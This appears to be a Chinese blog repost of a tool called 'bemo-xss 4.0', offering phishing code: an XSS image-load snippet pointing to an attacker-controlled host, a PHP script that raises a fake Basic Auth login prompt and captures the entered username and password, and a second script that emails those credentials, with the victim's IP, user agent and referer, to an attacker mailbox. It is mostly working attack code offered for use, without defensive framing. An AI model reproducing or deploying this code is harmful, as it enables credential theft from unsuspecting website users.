基础认证钓鱼利用代码----bemo-xss 4.0
2012-12-11 17:45
316 查看
调用方式:
具体代码见下面附件!
附件:http://down.51cto.com/data/2361941
x=new Image(); x.src="http://mysite.com/auth.php"; auth.php:
<?php if($_SERVER['PHP_AUTH_PW'] =="" || $_SERVER['PHP_AUTH_USER'] =="" ) { header('WWW-Authenticate: Basic realm="Basic Auth"'); header('HTTP/1.0 401 Unauthorized'); } else{ $user = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; $fish = "username:".$user." password:".$pass; header("location:http://mysite.com/x.php?c=$fish"); } ?>
X.PHP:
<?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET[c]; $time = date("Y-m-d G:i:s A"); $text = "<br><br>".$time." = ".$ip."<br><br>User Agent: ".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>"; require("class.phpmailer.php"); $mail = new PHPMailer(); $mail->CharSet = "UTF-8"; $address ="xssget@qq.com";//接收邮箱地址 $mail->IsSMTP(); // 使用SMTP方式发送 $mail->Host = "smtp.163.com"; // 您的邮箱域名 $mail->SMTPAuth = true; // 启用SMTP验证功能 $mail->Username = "xsssend@163.com"; // 邮局用户名(请填写完整的email地址) $mail->Password = "mailpwd"; // 邮局密码 $mail->Port=25; $mail->From = "xsssend@163.com"; //邮件发送者email地址 $mail->FromName = "Bemo-XSS success!"; $mail->AddAddress("$address", "a"); $mail->IsHTML(true); //是否使用HTML格式 $mail->Subject = "Bemo-XSS success!"; //邮件标题 $mail->Body = $text; //邮件内容,上面设置HTML,则可以是HTML if(!$mail->Send()) { echo "邮件发送失败. <p>"; echo "错误原因: " . $mail->ErrorInfo; exit; } ?>
具体代码见下面附件!
附件:http://down.51cto.com/data/2361941
相关文章推荐
- 基础认证钓鱼代码编写
- UI基础之UITableView案例微博----自定义cell利用代码
- Linux基础学习之利用tcpdump抓包实例代码
- 博客园存在基础认证钓鱼(401)可获取cookie
- C#之WinForm基础 图片查看器(在代码中指定查看文件夹与格式),利用listbox、picturebox
- 基础认证钓鱼攻击与防范
- PHP 基础认证钓鱼脚本
- 通过powershell实现基础认证钓鱼获得密码
- IOS开发基础—利用代码添加按钮和文本框
- 基础认证钓鱼
- 【mybatis源码学习】利用maven插件自动生成mybatis代码
- FluentData-新型轻量级ORM 利用T4模板 批量生成多文件 实体和业务逻辑 代码
- 利用Sphinx轻松生成python代码的文档
- java基础学习记录之利用数组查表法进行进制转换优化的学习与练习七(十转二、十转八、十转十六)
- 利用CSS使footer固定在页面底部的实例代码
- 利用git bash(git命令行)将本地代码上传到github上
- Android开发基础知识Android优化之代码优化
- 利用SEH进行代码混淆
- 2017.07.12 学习记录 js基础学习及代码
- Java 基础一些代码练习笔记(抽象类)